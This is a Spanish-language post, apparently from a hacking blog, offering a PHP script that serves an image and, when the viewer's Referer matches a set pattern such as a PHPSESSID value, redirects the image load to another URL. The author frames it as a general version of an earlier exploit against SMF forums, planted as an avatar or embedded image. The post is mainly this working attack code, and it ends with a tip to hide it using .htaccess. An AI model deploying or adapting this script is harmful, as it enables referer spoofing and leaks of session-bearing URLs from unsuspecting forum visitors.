Robo de Referer con imágenes (aka Rata 2)

Robo de Referer con imágenes (aka Rata 2)

Bueno aquí va un pequeño script que es mas como una versión general del exploit que saque hace un tiempo para el SMF, este es separado del Rata (R.A.T) que publique hace unos días, pero va con la misma idea, en si su funcionamiento lo podemos resumir de esta forma:

Muchos navegadores web siguen los encabezados Location aun cuando se trata de imágenes, lo curioso en este caso es que al seguir el Location el primer Referer se conserva, de modo que aunque sea direccionado 3 o mas veces el Referer seguirá siendo el del inicio, estos navegadores al seguir el Location aun cuando se están cargando imágenes nos abre un camino de posibilidades cuando la idea es spoofear un referer ya que no requerimos que el usuario de click en ningún enlace, simplemente que habrá una pagina donde se encuentra la imagen insertada (por ejemplo un foro o como avatar), esto aparentemente no funciona con chrome, pero si va con firefox e IE (confirmen si no es así con IE por favor).

Bueno ahora despues de esta introducción les coloco el código:

<?php
$imagen = 'rata.jpg';
// $_COOKIE['condicion'] = "PHPSESSID=";
// $_COOKIE['nueva'] = "http://hackingtelevision.blogspot.com";
function mostrarimagen($imagen) {
               header("Content-Type: image/jpeg");
               print file_get_contents($imagen);
}
if(!empty($_SERVER['HTTP_REFERER']) && preg_match("/".$_COOKIE['condicion']."/",$_SERVER['HTTP_REFERER'])) {
               header("Location: ".$_COOKIE['nueva'],TRUE,302);
}
else {
               header("HTTP/1.1 200 OK",TRUE,200);
}
mostrarimagen($imagen); // en navegadores como chrome que no siguen el Location se mostrara la imagen.
?>

como podrán apreciar es un código en extremo simple, pero quizás a alguien le sea de utilidad.

Ah se me pasaba, si quieren hacer que pase un poco mas desapercibido pueden usar .htaccess ;)...